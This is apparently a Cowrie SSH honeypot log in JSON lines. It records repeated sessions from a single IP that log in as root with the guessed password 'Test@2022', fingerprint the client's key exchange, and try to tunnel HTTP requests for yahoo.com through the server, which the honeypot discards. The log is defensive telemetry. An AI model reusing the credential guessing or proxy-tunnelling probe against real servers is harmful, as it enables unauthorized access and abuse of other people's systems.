{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.160536Z","src_ip":"213.209.150.239","session":"ad0997492b2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":13930,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:13930","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.297491Z","session":"ad0997492b2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.345457Z","src_ip":"213.209.150.239","session":"ad0997492b2c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.393415Z","src_ip":"213.209.150.239","session":"ad0997492b2c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4746,"dst_ip":"1.2.3.4","dst_port":22,"session":"4244f3fccdb6","protocol":"ssh","message":"New connection: 213.209.150.239:4746 (1.2.3.4:22) [session: 4244f3fccdb6]","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.439996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.440846Z","src_ip":"213.209.150.239","session":"4244f3fccdb6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.488154Z","src_ip":"213.209.150.239","session":"4244f3fccdb6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.724080Z","src_ip":"213.209.150.239","session":"4244f3fccdb6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":10781,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:10781","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.772352Z","session":"4244f3fccdb6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.820377Z","src_ip":"213.209.150.239","session":"4244f3fccdb6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":31987,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:31987","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.957851Z","session":"4244f3fccdb6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.005221Z","src_ip":"213.209.150.239","session":"4244f3fccdb6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.053214Z","src_ip":"213.209.150.239","session":"4244f3fccdb6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4792,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ca25ec83b24","protocol":"ssh","message":"New connection: 213.209.150.239:4792 (1.2.3.4:22) [session: 4ca25ec83b24]","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.109116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.110078Z","src_ip":"213.209.150.239","session":"4ca25ec83b24"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.166619Z","src_ip":"213.209.150.239","session":"4ca25ec83b24"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.449976Z","src_ip":"213.209.150.239","session":"4ca25ec83b24"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29932,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29932","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.507869Z","session":"4ca25ec83b24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.564707Z","src_ip":"213.209.150.239","session":"4ca25ec83b24"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":29459,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:29459","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.719122Z","session":"4ca25ec83b24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.776127Z","src_ip":"213.209.150.239","session":"4ca25ec83b24"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.833702Z","src_ip":"213.209.150.239","session":"4ca25ec83b24"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4843,"dst_ip":"1.2.3.4","dst_port":22,"session":"e849193d4dff","protocol":"ssh","message":"New connection: 213.209.150.239:4843 (1.2.3.4:22) [session: e849193d4dff]","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.879718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.888614Z","src_ip":"213.209.150.239","session":"e849193d4dff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:32.926947Z","src_ip":"213.209.150.239","session":"e849193d4dff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.162698Z","src_ip":"213.209.150.239","session":"e849193d4dff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17539,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17539","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.210738Z","session":"e849193d4dff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.258004Z","src_ip":"213.209.150.239","session":"e849193d4dff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16515,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16515","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.393678Z","session":"e849193d4dff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.441096Z","src_ip":"213.209.150.239","session":"e849193d4dff"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.489008Z","src_ip":"213.209.150.239","session":"e849193d4dff"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4887,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf2fb1fd706f","protocol":"ssh","message":"New connection: 213.209.150.239:4887 (1.2.3.4:22) [session: bf2fb1fd706f]","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.535415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.536263Z","src_ip":"213.209.150.239","session":"bf2fb1fd706f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.583523Z","src_ip":"213.209.150.239","session":"bf2fb1fd706f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.818693Z","src_ip":"213.209.150.239","session":"bf2fb1fd706f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":17538,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:17538","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.866702Z","session":"bf2fb1fd706f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:33.913992Z","src_ip":"213.209.150.239","session":"bf2fb1fd706f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25854,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25854","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.049524Z","session":"bf2fb1fd706f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.096710Z","src_ip":"213.209.150.239","session":"bf2fb1fd706f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.144790Z","src_ip":"213.209.150.239","session":"bf2fb1fd706f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4930,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8a7c4d2ffec","protocol":"ssh","message":"New connection: 213.209.150.239:4930 (1.2.3.4:22) [session: f8a7c4d2ffec]","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.191596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.192631Z","src_ip":"213.209.150.239","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.239914Z","src_ip":"213.209.150.239","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.475294Z","src_ip":"213.209.150.239","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8859,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8859","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.524151Z","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.571547Z","src_ip":"213.209.150.239","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11509,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11509","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.710033Z","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.757555Z","src_ip":"213.209.150.239","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.805938Z","src_ip":"213.209.150.239","session":"f8a7c4d2ffec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4979,"dst_ip":"1.2.3.4","dst_port":22,"session":"e628e4dec01d","protocol":"ssh","message":"New connection: 213.209.150.239:4979 (1.2.3.4:22) [session: e628e4dec01d]","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.852033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:34.852875Z","src_ip":"213.209.150.239","session":"e628e4dec01d"}
